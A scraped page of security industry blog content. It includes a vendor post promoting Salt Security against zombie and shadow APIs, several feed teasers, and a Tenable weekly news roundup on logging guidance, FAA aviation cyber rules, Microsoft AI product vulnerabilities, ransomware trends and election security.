In today’s hyper-connected digital landscape, APIs are the lifeblood of innovation, powering everything from customer experiences to internal operations. However, with this growing reliance on APIs comes a dark side—zombie and shadow APIs. These hidden, forgotten, or undocumented endpoints present significant security risks that traditional approaches simply can’t address. In this post, we’ll explore why these APIs are so dangerous and why Salt Security is the only solution capable of securing your entire API ecosystem.
What Are Zombie and Shadow APIs?Before diving into the risks, it’s essential to understand what we mean by zombie and shadow APIs:
Both types of APIs are typically overlooked by traditional security tools, yet they are ripe targets for attackers. Unmonitored and unmanaged, these endpoints can provide easy access points for data breaches, unauthorized access, and other malicious activities.
The Risks of Zombie and Shadow APIsThe hidden nature of these APIs makes them particularly dangerous. Here are a few key reasons why:
Legacy security tools and API management platforms are ill-equipped to handle the dynamic and often chaotic nature of modern API environments. They rely on manual processes, static documentation, or simple API gateways that can’t adapt to the fluid development cycles and sprawling microservices architectures seen today. This leaves a critical gap in security that attackers are all too eager to exploit.
How Salt Security Solves the Zombie and Shadow API ProblemSalt Security’s API Protection Platform stands alone in its ability to discover, monitor, and secure every API in your environment—no matter how obscure or hidden it may be. Here’s how:
While other solutions may claim to offer API protection, none provide the end-to-end capabilities needed to fully secure zombie and shadow APIs. Salt Security offers the most comprehensive AI-infused platform for API security, combining deep discovery, continuous monitoring, governance, and proactive threat detection. Our solution not only finds hidden APIs—it safeguards them, ensuring your organization’s API landscape remains resilient, compliant, and secure.
ConclusionZombie and shadow APIs represent a hidden yet significant threat to your organization’s security posture. With traditional tools falling short, it’s time to rethink your API security strategy. Salt Security’s unique capabilities make it the only solution capable of addressing the full spectrum of API threats—including those you can’t see.
By choosing Salt Security, you can rest assured that your APIs—documented or not—are fully protected, enabling your business to innovate without compromise.
If you want to learn more about Salt and how we can help you on your API Security journey through discovery, posture management, and run-time threat protection, please contact us, schedule a demo, or check out our website.
The post The Hidden Dangers of Zombie and Shadow APIs—and Why Only Salt Security Can Tackle Them appeared first on Security Boulevard.
We’re excited to announce the integration of Azure Boards into Strobes, enhancing your project management capabilities and streamlining your vulnerability tracking processes. Azure Boards Overview: Azure Boards is a project...
The post Introducing Azure Boards Integration in Strobes appeared first on Strobes Security.
The post Introducing Azure Boards Integration in Strobes appeared first on Security Boulevard.
This post walks through the vulnerabilities we disclosed affecting Gradio, and our work with Hugging Face to harden the Spaces platform after a recently reported potential breach.
The post NTLM Credential Theft in Python Windows Applications appeared first on Horizon3.ai.
The post NTLM Credential Theft in Python Windows Applications appeared first on Security Boulevard.
Authorities nab crypto and extortion criminals, cloud hacktool identified in spam SMS attacks, and DPRK actors exploit Windows zero-day.
The post The Good, the Bad and the Ugly in Cybersecurity – Week 34 appeared first on SentinelOne.
Looking to sharpen your team’s event logging and threat detection? A new guide offers plenty of best practices. Plus, the FAA wants airplanes to be more resilient to cyberattacks. Meanwhile, check out the critical vulnerabilities Tenable discovered in two Microsoft AI products. And get the latest on ransomware trends, vulnerability management practices and election security!
Dive into six things that are top of mind for the week ending August 23.
1 - Guide outlines logging and threat detection best practicesAs attackers double down on the use of stealthy, hard-to-detect “living off the land” (LOTL) techniques, cybersecurity teams should improve how they log events and detect threats. That’s the call government agencies from multiple countries made in a joint guide published this week and titled “Best Practices for Event Logging and Threat Detection.”
“Event logging supports the continued delivery of operations and improves the security and resilience of critical systems by enabling network visibility,” reads the guide, which was developed by the Australian Cyber Security Centre (ACSC).
The guide, whose intended audience includes senior IT and operational technology (OT) leaders and operators, network administrators and critical infrastructure providers, groups its best practices under four categories:
The guide’s recommendations can help “detect malicious activity, behavioral anomalies, and compromised networks, devices, or accounts,” reads a statement from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which collaborated with the ACSC, along with cyber agencies from seven other countries.
To get more details, check out:
For more information about event logging and threat detection:
To beef up the aviation sector’s cyber defenses, the U.S. government this week proposed new cybersecurity rules for airplanes, engines and propellers as they become increasingly connected to computer networks and services.
In a proposed rulemaking notice, the U.S. Federal Aviation Administration (FAA) said some of its regulations are “inadequate and inappropriate to address the cybersecurity vulnerabilities caused by increased interconnectivity.”
Current designs for airplanes can make them vulnerable to cyber risks from maintenance laptops; airport or airline networks; the internet; wireless sensors and their networks; USB devices; and cellular and satellite systems and communications; and more.
The proposed new and revised rules seek to protect airplanes, engines and propellers from “intentional unauthorized electronic interactions” (IUEI) so the FAA wants to require product designers and makers to “identify” and “assess” IUEI risks and mitigate them.
To that end, they would need to conduct a security risk analysis to identify all cyberthreats, assess threat severity, determine exploitation likelihood and mitigate these security issues.
The proposed rules are now open for public comment.
To get more details, check out the 36-page notice of proposed rulemaking titled “Equipment, Systems, and Network Information Security Protection.”
For more information about aviation cybersecurity:
Tenable Research recently discovered critical vulnerabilities in Microsoft’s Azure Health Bot Service and Copilot Studio.
In the case of Azure Health Bot Service, a cloud platform for deploying AI-powered virtual health assistants, the critical vulnerabilities allowed researchers access to cross-tenant resources within this service.
Meanwhile, a server-side request forgery (SSRF) vulnerability in Copilot Studio allowed researchers access to potentially sensitive information regarding service internals with potential cross-tenant impact. With Copilot Studio, you can build custom Copilot conversational applications for performing large language model (LLM) and generative AI tasks.
To get all the details, read these Tenable blogs:
You can also find media coverage of the two discoveries here:
Copilot Studio
Azure Health Bot Service
During our recent webinar “From Frustration to Efficiency: Optimize Your Vuln Management Workflows and Security with Tenable,” we polled attendees on their biggest VM challenge and on patching prioritization. Check out what they said!
(231 webinar attendees polled by Tenable, August 2024)
(234 webinar attendees polled by Tenable, August 2024)
Want to learn how to improve key vulnerability management practices, including remediation prioritization? Watch this on-demand webinar “From Frustration to Efficiency: Optimize Your Vuln Management Workflows and Security with Tenable.”
5 - Report: Ransomware attacks jumped in July, as attackers turn to infostealer malwareRansomware attacks spiked 20% globally in July, compared with June, as the RansomHub gang emerged as the most active group.
However, ransomware attacks were down compared with July 2023, and “remain much lower” compared with the activity observed between February to May of this year.
That’s according to the “Monthly Threat Pulse” report for July 2024, published this week by NCC Group’s Global Threat Intelligence team.
“Whether this increase reflects the start of an upward trend remains to be seen,” the report reads.
Global Ransomware Attacks by Month 2023 - 2024
(Source: “Monthly Threat Pulse” report from NCC Group, August 2024)
The industrials sector was the hardest hit, receiving about a third of all attacks, a clear sign of ransomware groups’ strong interest in breaching critical-infrastructure organizations, the report says.
Ransomware groups pounced on CVE-2024-37085, an authentication-bypass vulnerability in the VMware ESXi hypervisor product, a reminder that organizations need to continue to prioritize patching high-risk bugs.
While vulnerability exploitation remains a popular tactic for ransomware attackers, they’re also increasing their use of information stealer malware, which offers them a “far easier, faster and often cheaper” way to access a network via the use of stolen credentials, the report reads.
“The rise in sophisticated techniques, such as the use of information stealer malware in their pre-attack phase, highlights that cybercriminals are not standing still. As these threats evolve, so must our defences,” Ian Usher, Deputy Head of Threat Intelligence at NCC Group, said in a statement.
To get more details, check out:
For more information about ransomware trends:
Although ransomware gangs may try to disrupt the U.S. general election, their attacks won’t compromise the voting and counting processes, according to CISA and the FBI. At best, ransomware attacks would cause isolated delays and be minimally disruptive.
“The public should be aware that ransomware is extremely unlikely to affect the integrity of voting systems or the electoral process,” FBI Cyber Division Deputy Assistant Director Cynthia Kaiser said in a statement.
The reason: U.S. election officials have put in place what CISA and the FBI call a “multi-layer approach to security” with a variety of technical, physical and procedural safeguards.
“In the event of a ransomware event affecting their offices, election officials have plans and redundancies in place to allow voting operations to continue so that all eligible voters are able to cast their ballot securely,” reads a joint public-service announcement from CISA and the FBI.
To get more details, check out: